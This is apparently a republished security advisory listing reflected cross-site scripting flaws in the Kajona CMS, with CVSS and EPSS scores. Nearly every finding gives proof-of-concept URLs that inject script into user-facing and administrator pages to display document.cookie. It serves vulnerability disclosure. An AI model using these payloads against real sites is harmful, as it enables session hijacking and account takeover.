4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.003 Low
EPSS
Percentile
66.4%
High-Tech Bridge Security Research Lab has discovered multiple Cross-Site Scripting (XSS) vulnerabilities in Kajona.
1.2 Input passed via the “comment_name”, “comment_subject” and “comment_message” GET parameters to /index.php (when “page” is set to “postacomment”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?page=postacomment&comment_name="><script>ale rt%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=postacom ment&comment_subject=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://kajona/index.php?page=postacomment&comment_message=</textarea% 3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.3 Input passed via the “module” GET parameter to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?module=<script>alert(document.cookie);</sc ript%3E
1.4 Input passed via the “action” GET parameter to /index.php (when “module” is set to “login” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?module=login&admin=1&action=<script>alert(docu ment.cookie%29;%3C/script%3E
1.5 Input passed via the “pv” and “pe” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “list” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=user&action=list&pv="><script%3 Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&m odule=user&action=list&pe=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
1.6 Input passed via the “user_username”, “user_email”, “user_forename”, “user_name”, “user_street”, “user_postal”, “user_city”, “user_tel” and “user_mobile” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “newUser” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=user&action=newUser&user_username=" %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index .php?admin=1&module=user&action=newUser&user_email=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=us er&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&u ser_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http:// kajona/index.php?admin=1&module=user&action=newUser&user_street=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admi n=1&module=user&action=newUser&user_postal=%22%3E%3Cscript%3Ealert%28documen t.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&actio n=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_tel="% 3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index. php?admin=1&module=user&action=newUser&user_mobile=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
1.7 Input passed via the “group_name” and “group_desc” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “groupNew” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=user&action=groupNew&group_name="%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.p hp?admin=1&module=user&action=groupNew&group_desc=%3C/textarea%3E%3Cscript%3 Ealert%28document.cookie%29;%3C/script%3E
1.8 Input passed via the “name”, “browsername”, “seostring”, “keywords” and “folder_id” GET parameters to /index.php (when “module” is set to “pages”, “action” is set to “newPage” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=pages&action=newPage&name="><sc ript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?adm in=1&module=pages&action=newPage&browsername=%22%3E%3Cscript%3Ealert%28docum ent.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&ac tion=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scri pt%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&keywords= %3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http:// kajona/index.php?admin=1&module=pages&action=newPage&folder_id=%22%3E%3Cscri pt%3Ealert%28document.cookie%29;%3C/script%3E
1.9 Input passed via the “element_name” and “element_cachetime” GET parameters to /index.php (when “module” is set to “pages”, “action” is set to “newElement” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=pages&action=newElement&element_name= %22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/in dex.php?admin=1&module=pages&action=newElement&element_cachetime=%22%3E%3Csc ript%3Ealert%28document.cookie%29;%3C/script%3E
1.10 Input passed via the “aspect_name” GET parameter to /index.php (when “module” is set to “system”, “action” is set to “newAspect” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?admin=1&module=system&action=newAspect&aspect_name=% 22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.11 Input passed via the “filemanager_name”, “filemanager_path”, “filemanager_upload_filter” and “filemanager_view_filter” GET parameters to /index.php (when “module” is set to “filemanager”, “action” is set to “newRepo” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanage r_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://ka jona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_path=%2 2%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/inde x.php?admin=1&module=filemanager&action=newRepo&filemanager_upload_filter=%2 2%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/inde x.php?admin=1&module=filemanager&action=newRepo&filemanager_view_filter=%22% 3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.12 Input passed via the “archive_title” and “archive_path” GET parameters to /index.php (when “module” is set to “downloads”, “action” is set to “newArchive” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of affected website.
The following PoC demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=downloads&action=newArchive&archive_t itle=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajo na/index.php?admin=1&module=downloads&action=newArchive&archive_path=%22%3E% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E